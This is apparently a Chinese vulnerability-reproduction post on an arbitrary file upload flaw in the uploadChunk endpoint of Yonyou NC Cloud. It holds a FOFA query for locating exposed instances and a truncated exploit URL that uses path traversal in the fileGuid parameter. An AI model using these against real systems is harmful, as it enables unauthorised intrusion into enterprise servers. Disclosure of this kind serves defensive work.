【漏洞复现】用友NC Cloud uploadChunk任意文件上传漏洞

漏洞描述

用友 NC Cloud，大型企业数字化平台， 聚焦数字化管理、数字化经营、数字化商业，帮助大型企业实现 人、财、物、客的全面数字化，从而驱动业务创新与管理变革，与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类，68个细分行业，涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案，帮助企业全面落地数字化。用友NC Cloud uploadChunk接口存在任意文件上传漏洞

影响版本

用友NC Cloud

免责声明

技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从事危害国家安全、荣誉和利益，未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责。本文所提供的工具仅用于学习，禁止用于其他！！

资产确定

fofa  app="用友-NC-Cloud"

漏洞复现

漏洞链接：http://127.0.0.1/ncchr/pm/fb/attachment/uploadChunk?fileGuid=/…/…/…/nccloud/&chunk=1&chunks=